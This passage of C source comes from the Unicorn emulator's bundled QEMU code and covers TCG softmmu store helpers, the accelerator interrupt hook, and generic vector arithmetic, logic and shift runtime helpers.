*/ val8 = val >> (i * 8); } helper_ret_stb_mmu(env, addr + i, val8, oi, retaddr); } uc->size_recur_mem = old_size; return; } haddr = (void *)((uintptr_t)addr + entry->addend); store_memop(haddr, val, op); } void helper_ret_stb_mmu(CPUArchState *env, target_ulong addr, uint8_t val, TCGMemOpIdx oi, uintptr_t retaddr) { store_helper(env, addr, val, oi, retaddr, MO_UB); } void helper_le_stw_mmu(CPUArchState *env, target_ulong addr, uint16_t val, TCGMemOpIdx oi, uintptr_t retaddr) { store_helper(env, addr, val, oi, retaddr, MO_LEUW); } void helper_be_stw_mmu(CPUArchState *env, target_ulong addr, uint16_t val, TCGMemOpIdx oi, uintptr_t retaddr) { store_helper(env, addr, val, oi, retaddr, MO_BEUW); } void helper_le_stl_mmu(CPUArchState *env, target_ulong addr, uint32_t val, TCGMemOpIdx oi, uintptr_t retaddr) { store_helper(env, addr, val, oi, retaddr, MO_LEUL); } void helper_be_stl_mmu(CPUArchState *env, target_ulong addr, uint32_t val, TCGMemOpIdx oi, uintptr_t retaddr) { store_helper(env, addr, val, oi, retaddr, MO_BEUL); } void helper_le_stq_mmu(CPUArchState *env, target_ulong addr, uint64_t val, TCGMemOpIdx oi, uintptr_t retaddr) { store_helper(env, addr, val, oi, retaddr, MO_LEQ); } void helper_be_stq_mmu(CPUArchState *env, target_ulong addr, uint64_t val, TCGMemOpIdx oi, uintptr_t retaddr) { store_helper(env, addr, val, oi, retaddr, MO_BEQ); } /* * Store Helpers for cpu_ldst.h */ static inline void cpu_store_helper(CPUArchState *env, target_ulong addr, uint64_t val, int mmu_idx, uintptr_t retaddr, MemOp op) // qq { TCGMemOpIdx oi; oi = make_memop_idx(op, mmu_idx); store_helper(env, addr, val, oi, retaddr, op); } void cpu_stb_mmuidx_ra(CPUArchState *env, target_ulong addr, uint32_t val, int mmu_idx, uintptr_t retaddr) { cpu_store_helper(env, addr, val, mmu_idx, retaddr, MO_UB); } void cpu_stw_mmuidx_ra(CPUArchState *env, target_ulong addr, uint32_t val, int mmu_idx, uintptr_t retaddr) { cpu_store_helper(env, addr, val, mmu_idx, retaddr, MO_TEUW); } void cpu_stl_mmuidx_ra(CPUArchState *env, target_ulong addr, uint32_t val, int mmu_idx, uintptr_t retaddr) { cpu_store_helper(env, addr, val, mmu_idx, retaddr, MO_TEUL); } void cpu_stq_mmuidx_ra(CPUArchState *env, target_ulong addr, uint64_t val, int mmu_idx, uintptr_t retaddr) { cpu_store_helper(env, addr, val, mmu_idx, retaddr, MO_TEQ); } void cpu_stb_data_ra(CPUArchState *env, target_ulong ptr, uint32_t val, uintptr_t retaddr) { cpu_stb_mmuidx_ra(env, ptr, val, cpu_mmu_index(env, false), retaddr); } void cpu_stw_data_ra(CPUArchState *env, target_ulong ptr, uint32_t val, uintptr_t retaddr) { cpu_stw_mmuidx_ra(env, ptr, val, cpu_mmu_index(env, false), retaddr); } void cpu_stl_data_ra(CPUArchState *env, target_ulong ptr, uint32_t val, uintptr_t retaddr) { cpu_stl_mmuidx_ra(env, ptr, val, cpu_mmu_index(env, false), retaddr); } void cpu_stq_data_ra(CPUArchState *env, target_ulong ptr, uint64_t val, uintptr_t retaddr) { cpu_stq_mmuidx_ra(env, ptr, val, cpu_mmu_index(env, false), retaddr); } void cpu_stb_data(CPUArchState *env, target_ulong ptr, uint32_t val) { cpu_stb_data_ra(env, ptr, val, 0); } void cpu_stw_data(CPUArchState *env, target_ulong ptr, uint32_t val) { cpu_stw_data_ra(env, ptr, val, 0); } void cpu_stl_data(CPUArchState *env, target_ulong ptr, uint32_t val) { cpu_stl_data_ra(env, ptr, val, 0); } void cpu_stq_data(CPUArchState *env, target_ulong ptr, uint64_t val) { cpu_stq_data_ra(env, ptr, val, 0); } /* First set of helpers allows passing in of OI and RETADDR. This makes them callable from other helpers. 
*/ #define EXTRA_ARGS , TCGMemOpIdx oi, uintptr_t retaddr #define ATOMIC_NAME(X) \ HELPER(glue(glue(glue(atomic_ ## X, SUFFIX), END), _mmu)) #define ATOMIC_MMU_DECLS #define ATOMIC_MMU_LOOKUP atomic_mmu_lookup(env, addr, oi, retaddr) #define ATOMIC_MMU_CLEANUP #define ATOMIC_MMU_IDX get_mmuidx(oi) #define DATA_SIZE 1 #include "atomic_template.h" #define DATA_SIZE 2 #include "atomic_template.h" #define DATA_SIZE 4 #include "atomic_template.h" #ifdef CONFIG_ATOMIC64 #define DATA_SIZE 8 #include "atomic_template.h" #endif #if HAVE_CMPXCHG128 || HAVE_ATOMIC128 #define DATA_SIZE 16 #include "atomic_template.h" #endif /* Second set of helpers is directly callable from TCG. */ #undef EXTRA_ARGS #undef ATOMIC_NAME #undef ATOMIC_MMU_LOOKUP #define EXTRA_ARGS , TCGMemOpIdx oi #define ATOMIC_NAME(X) HELPER(glue(glue(atomic_ ## X, SUFFIX), END)) #define ATOMIC_MMU_LOOKUP atomic_mmu_lookup(env, addr, oi, GETPC()) #define DATA_SIZE 1 #include "atomic_template.h" #define DATA_SIZE 2 #include "atomic_template.h" #define DATA_SIZE 4 #include "atomic_template.h" #ifdef CONFIG_ATOMIC64 #define DATA_SIZE 8 #include "atomic_template.h" #endif #undef ATOMIC_MMU_IDX /* Code access functions. */ static uint64_t full_ldub_code(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return load_helper(env, addr, oi, retaddr, MO_8, true, full_ldub_code); } uint32_t cpu_ldub_code(CPUArchState *env, abi_ptr addr) { TCGMemOpIdx oi = make_memop_idx(MO_UB, cpu_mmu_index(env, true)); return full_ldub_code(env, addr, oi, 0); } static uint64_t full_lduw_code(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return load_helper(env, addr, oi, retaddr, MO_TEUW, true, full_lduw_code); } uint32_t cpu_lduw_code(CPUArchState *env, abi_ptr addr) { TCGMemOpIdx oi = make_memop_idx(MO_TEUW, cpu_mmu_index(env, true)); return full_lduw_code(env, addr, oi, 0); } static uint64_t full_ldl_code(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return load_helper(env, addr, oi, retaddr, MO_TEUL, true, full_ldl_code); } uint32_t cpu_ldl_code(CPUArchState *env, abi_ptr addr) { TCGMemOpIdx oi = make_memop_idx(MO_TEUL, cpu_mmu_index(env, true)); return full_ldl_code(env, addr, oi, 0); } static uint64_t full_ldq_code(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return load_helper(env, addr, oi, retaddr, MO_TEQ, true, full_ldq_code); } uint64_t cpu_ldq_code(CPUArchState *env, abi_ptr addr) { TCGMemOpIdx oi = make_memop_idx(MO_TEQ, cpu_mmu_index(env, true)); return full_ldq_code(env, addr, oi, 0); }
unicorn-2.1.1/qemu/accel/tcg/tcg-all.c
/* * QEMU System Emulator, accelerator interfaces * * Copyright (c) 2003-2008 Fabrice Bellard * Copyright (c) 2014 Red Hat Inc. 
* * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "qemu/osdep.h" #include "sysemu/tcg.h" #include "cpu.h" #include "sysemu/cpus.h" #include "tcg/tcg.h" /* mask must never be zero, except for A20 change call */ static void tcg_handle_interrupt(CPUState *cpu, int mask) { cpu->interrupt_request |= mask; } CPUInterruptHandler cpu_interrupt_handler = tcg_handle_interrupt;
unicorn-2.1.1/qemu/accel/tcg/tcg-runtime-gvec.c
/* * Generic vectorized operation runtime * * Copyright (c) 2018 Linaro * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. 
*/ #include "qemu/osdep.h" #include "qemu/host-utils.h" #include "cpu.h" #include "exec/helper-proto.h" #include "tcg/tcg-gvec-desc.h" static inline void clear_high(void *d, intptr_t oprsz, uint32_t desc) { intptr_t maxsz = simd_maxsz(desc); intptr_t i; if (unlikely(maxsz > oprsz)) { for (i = oprsz; i < maxsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = 0; } } } void HELPER(gvec_add8)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { *(uint8_t *)((char *)d + i) = *(uint8_t *)((char *)a + i) + *(uint8_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_add16)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { *(uint16_t *)((char *)d + i) = *(uint16_t *)((char *)a + i) + *(uint16_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_add32)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { *(uint32_t *)((char *)d + i) = *(uint32_t *)((char *)a + i) + *(uint32_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_add64)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) + *(uint64_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_adds8)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { *(uint8_t *)((char *)d + i) = *(uint8_t *)((char *)a + i) + (uint8_t)b; } clear_high(d, oprsz, desc); } void HELPER(gvec_adds16)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { *(uint16_t *)((char *)d + i) = *(uint16_t *)((char *)a + i) + (uint16_t)b; } clear_high(d, oprsz, desc); } void HELPER(gvec_adds32)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { *(uint32_t *)((char *)d + i) = *(uint32_t *)((char *)a + i) + (uint32_t)b; } clear_high(d, oprsz, desc); } void HELPER(gvec_adds64)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) + b; } clear_high(d, oprsz, desc); } void HELPER(gvec_sub8)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { *(uint8_t *)((char *)d + i) = *(uint8_t *)((char *)a + i) - *(uint8_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_sub16)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { *(uint16_t *)((char *)d + i) = *(uint16_t *)((char *)a + i) - *(uint16_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_sub32)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { *(uint32_t *)((char *)d + i) = *(uint32_t *)((char *)a + i) - *(uint32_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_sub64)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = 
simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) - *(uint64_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_subs8)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { *(uint8_t *)((char *)d + i) = *(uint8_t *)((char *)a + i) - (uint8_t)b; } clear_high(d, oprsz, desc); } void HELPER(gvec_subs16)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { *(uint16_t *)((char *)d + i) = *(uint16_t *)((char *)a + i) - (uint16_t)b; } clear_high(d, oprsz, desc); } void HELPER(gvec_subs32)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { *(uint32_t *)((char *)d + i) = *(uint32_t *)((char *)a + i) - (uint32_t)b; } clear_high(d, oprsz, desc); } void HELPER(gvec_subs64)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) - b; } clear_high(d, oprsz, desc); } void HELPER(gvec_mul8)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { *(uint8_t *)((char *)d + i) = *(uint8_t *)((char *)a + i) * *(uint8_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_mul16)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { *(uint16_t *)((char *)d + i) = *(uint16_t *)((char *)a + i) * *(uint16_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_mul32)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { *(uint32_t *)((char *)d + i) = *(uint32_t *)((char *)a + i) * *(uint32_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_mul64)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) * *(uint64_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_muls8)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { *(uint8_t *)((char *)d + i) = *(uint8_t *)((char *)a + i) * (uint8_t)b; } clear_high(d, oprsz, desc); } void HELPER(gvec_muls16)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { *(uint16_t *)((char *)d + i) = *(uint16_t *)((char *)a + i) * (uint16_t)b; } clear_high(d, oprsz, desc); } void HELPER(gvec_muls32)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { *(uint32_t *)((char *)d + i) = *(uint32_t *)((char *)a + i) * (uint32_t)b; } clear_high(d, oprsz, desc); } void HELPER(gvec_muls64)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) * b; } clear_high(d, oprsz, desc); } void HELPER(gvec_neg8)(void *d, void *a, 
uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { *(uint8_t *)((char *)d + i) = -*(uint8_t *)((char *)a + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_neg16)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { *(uint16_t *)((char *)d + i) = -*(uint16_t *)((char *)a + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_neg32)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { #ifdef _MSC_VER *(uint32_t *)((char *)d + i) = 0U - *(uint32_t *)((char *)a + i); #else *(uint32_t *)((char *)d + i) = -*(uint32_t *)((char *)a + i); #endif } clear_high(d, oprsz, desc); } void HELPER(gvec_neg64)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { #ifdef _MSC_VER *(uint64_t *)((char *)d + i) = 0ULL - *(uint64_t *)((char *)a + i); #else *(uint64_t *)((char *)d + i) = -*(uint64_t *)((char *)a + i); #endif } clear_high(d, oprsz, desc); } void HELPER(gvec_abs8)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int8_t)) { int8_t aa = *(int8_t *)((char *)a + i); *(int8_t *)((char *)d + i) = aa < 0 ? -aa : aa; } clear_high(d, oprsz, desc); } void HELPER(gvec_abs16)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int16_t)) { int16_t aa = *(int16_t *)((char *)a + i); *(int16_t *)((char *)d + i) = aa < 0 ? -aa : aa; } clear_high(d, oprsz, desc); } void HELPER(gvec_abs32)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int32_t)) { int32_t aa = *(int32_t *)((char *)a + i); *(int32_t *)((char *)d + i) = aa < 0 ? -aa : aa; } clear_high(d, oprsz, desc); } void HELPER(gvec_abs64)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(int64_t)) { int64_t aa = *(int64_t *)((char *)a + i); *(int64_t *)((char *)d + i) = aa < 0 ? 
-aa : aa; } clear_high(d, oprsz, desc); } void HELPER(gvec_mov)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); memcpy(d, a, oprsz); clear_high(d, oprsz, desc); } void HELPER(gvec_dup64)(void *d, uint32_t desc, uint64_t c) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; if (c == 0) { oprsz = 0; } else { for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = c; } } clear_high(d, oprsz, desc); } void HELPER(gvec_dup32)(void *d, uint32_t desc, uint32_t c) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; if (c == 0) { oprsz = 0; } else { for (i = 0; i < oprsz; i += sizeof(uint32_t)) { *(uint32_t *)((char *)d + i) = c; } } clear_high(d, oprsz, desc); } void HELPER(gvec_dup16)(void *d, uint32_t desc, uint32_t c) { HELPER(gvec_dup32)(d, desc, 0x00010001 * (c & 0xffff)); } void HELPER(gvec_dup8)(void *d, uint32_t desc, uint32_t c) { HELPER(gvec_dup32)(d, desc, 0x01010101 * (c & 0xff)); } void HELPER(gvec_not)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = ~*(uint64_t *)((char *)a + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_and)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) & *(uint64_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_or)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) | *(uint64_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_xor)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) ^ *(uint64_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_andc)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) &~ *(uint64_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_orc)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) |~ *(uint64_t *)((char *)b + i); } clear_high(d, oprsz, desc); } void HELPER(gvec_nand)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = ~(*(uint64_t *)((char *)a + i) & *(uint64_t *)((char *)b + i)); } clear_high(d, oprsz, desc); } void HELPER(gvec_nor)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = ~(*(uint64_t *)((char *)a + i) | *(uint64_t *)((char *)b + i)); } clear_high(d, oprsz, desc); } void HELPER(gvec_eqv)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = ~(*(uint64_t *)((char *)a + i) ^ *(uint64_t *)((char *)b + i)); } clear_high(d, oprsz, desc); } void HELPER(gvec_ands)(void *d, void *a, uint64_t b, uint32_t desc) { 
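/* Scalar-operand variant: the 64-bit immediate 'b' is ANDed into every
   64-bit lane of 'a', mirroring the vector/vector gvec_and above. */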
intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) & b; } clear_high(d, oprsz, desc); } void HELPER(gvec_xors)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) ^ b; } clear_high(d, oprsz, desc); } void HELPER(gvec_ors)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) | b; } clear_high(d, oprsz, desc); } void HELPER(gvec_shl8i)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); int shift = simd_data(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { *(uint8_t *)((char *)d + i) = *(uint8_t *)((char *)a + i) << shift; } clear_high(d, oprsz, desc); } void HELPER(gvec_shl16i)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); int shift = simd_data(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { *(uint16_t *)((char *)d + i) = *(uint16_t *)((char *)a + i) << shift; } clear_high(d, oprsz, desc); } void HELPER(gvec_shl32i)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); int shift = simd_data(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { *(uint32_t *)((char *)d + i) = *(uint32_t *)((char *)a + i) << shift; } clear_high(d, oprsz, desc); } void HELPER(gvec_shl64i)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); int shift = simd_data(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) << shift; } clear_high(d, oprsz, desc); } void HELPER(gvec_shr8i)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); int shift = simd_data(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { *(uint8_t *)((char *)d + i) = *(uint8_t *)((char *)a + i) >> shift; } clear_high(d, oprsz, desc); } void HELPER(gvec_shr16i)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); int shift = simd_data(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { *(uint16_t *)((char *)d + i) = *(uint16_t *)((char *)a + i) >> shift; } clear_high(d, oprsz, desc); } void HELPER(gvec_shr32i)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); int shift = simd_data(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { *(uint32_t *)((char *)d + i) = *(uint32_t *)((char *)a + i) >> shift; } clear_high(d, oprsz, desc); } void HELPER(gvec_shr64i)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); int shift = simd_data(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) >> shift; } clear_high(d, oprsz, desc); } void HELPER(gvec_sar8i)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); int shift = simd_data(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { *(int8_t *)((char *)d + i) = *(int8_t *)((char *)a + i) >> shift; } clear_high(d, oprsz, desc); } void HELPER(gvec_sar16i)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); int shift = simd_data(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { *(int16_t *)((char *)d + i) = *(int16_t *)((char *)a + i) >> shift; } clear_high(d, oprsz, 
desc); } void HELPER(gvec_sar32i)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); int shift = simd_data(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { *(int32_t *)((char *)d + i) = *(int32_t *)((char *)a + i) >> shift; } clear_high(d, oprsz, desc); } void HELPER(gvec_sar64i)(void *d, void *a, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); int shift = simd_data(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { *(int64_t *)((char *)d + i) = *(int64_t *)((char *)a + i) >> shift; } clear_high(d, oprsz, desc); } void HELPER(gvec_shl8v)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint8_t)) { uint8_t sh = *(uint8_t *)((char *)b + i) & 7; *(uint8_t *)((char *)d + i) = *(uint8_t *)((char *)a + i) << sh; } clear_high(d, oprsz, desc); } void HELPER(gvec_shl16v)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint16_t)) { uint8_t sh = *(uint16_t *)((char *)b + i) & 15; *(uint16_t *)((char *)d + i) = *(uint16_t *)((char *)a + i) << sh; } clear_high(d, oprsz, desc); } void HELPER(gvec_shl32v)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint32_t)) { uint8_t sh = *(uint32_t *)((char *)b + i) & 31; *(uint32_t *)((char *)d + i) = *(uint32_t *)((char *)a + i) << sh; } clear_high(d, oprsz, desc); } void HELPER(gvec_shl64v)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += sizeof(uint64_t)) { uint8_t sh = *(uint64_t *)((char *)b + i) & 63; *(uint64_t *)((char *)d + i) = *(uint64_t *)((char *)a + i) << sh; } clear_high(d, oprsz, desc); } void HELPER(gvec_shr8v)(void *d, void *a, void *b, uint32_t desc) { intptr_t oprsz = simd_oprsz(desc); intptr_t i; for (i = 0; i < oprsz; i += 